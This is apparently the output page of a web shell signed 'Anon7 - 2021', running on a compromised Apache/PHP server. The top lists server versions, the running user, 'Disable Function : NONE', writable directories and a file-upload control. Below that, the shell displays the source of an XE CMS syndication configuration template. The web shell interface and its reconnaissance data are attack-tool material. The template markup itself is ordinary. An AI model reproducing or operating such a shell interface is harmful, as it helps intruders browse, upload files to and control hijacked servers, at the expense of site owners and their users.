KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/xe/modules/syndication/tpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/xe/modules/syndication/tpl/config.html
<!--%import("css/syndication.css")-->
<!--%import("js/syndication.js")-->
<!--%import("filter/insert_service.xml")-->

<h3 class="xeAdmin">{$lang->syndication} <span class="gray">{$lang->cmd_management}</span></h3>
<p class="summary">{$lang->about_syndication}</p>

<form action="./" method="get" onsubmit="return procFilter(this, insert_service);">
    <input type="hidden" name="year" value="{$year}" />
    <table cellspacing="0" class="rowTable">
    <tr>
        <th scope="row"><div>{$lang->my_syndication_url}</div></th>
        <td>
            http://<input type="text" id="site_url" name="site_url" value="{$site_url}" class="inputTypeText siteUrl" />
            <span class="button green"><input type="button" value="{$lang->cmd_check_syndication_echo}" onclick="pingSite(jQuery('#site_url').val())" /></span>
            <p>{$lang->about_my_syndication_url}</p>
			<p class="ping_test_result"></p>
        </td>
    </tr>
    <tr>
        <th scope="row"><div>{$lang->syndication_service}</div></th>
        <td>
            <ul class="syndiService">
            <!--@foreach($services as $key => $val)-->
                <li>
                    <input type="checkbox" name="target_services" value="{$val->service}" id="target_service_{$val->service}" <!--@if($val->selected)-->checked="checked"<!--@end--> />
                    <label for="target_service_{$val->service}">{$val->service}</label>
					<!--@if($val->selected)--><span class="button green small"><input type="button" value="{$lang->cmd_check_syndication_status}" onclick="checkSyndicationStatus('{$val->service}')" /></span><!--@end-->
                </li>
            <!--@end-->
            </ul>
			<div class="print_result_status"></div>
            <p>{$lang->about_syndication}</p>
        </td>
    </tr>
    <tr>
        <th scope="row"><div>{$lang->except_module}</div></th>
        <td>
            <select name="_except_module" id="_except_module" size="10" class="exceptModuleList">
                {@$except_module_srls = array()}
                <!--@foreach($except_module as $v)-->
                {@$except_module_srls[] = $v->module_srl}
                <option value="{$v->module_srl}">{$v->browser_title} ({$v->mid})</option>
                <!--@end-->
            </select>
            <ul class="midCommand">
                <li><a href="{getUrl('','module','module','act','dispModuleSelectList','id','except_module')}" onclick="popopen(this.href, 'ModuleSelect');return false;" class="button blue"><span>{$lang->cmd_insert}</span></a></li>
                <li><a href="#" onclick="removeExceptModule('except_module');return false;" class="button red"><span>{$lang->cmd_delete}</span></a></li>
            </ul>
            <p>{$lang->about_except_module}</p>
            <input type="hidden" name="except_module" id="except_module" value="{implode(',',$except_module_srls)}" />
        </td>
    </tr>
    <tr>
        <th colspan="2" class="button">
            <span class="button black strong"><input type="submit" value="{$lang->cmd_apply}" accesskey="s" /></span>
        </th>
    </tr>
    </table>
</form>

Anon7 - 2021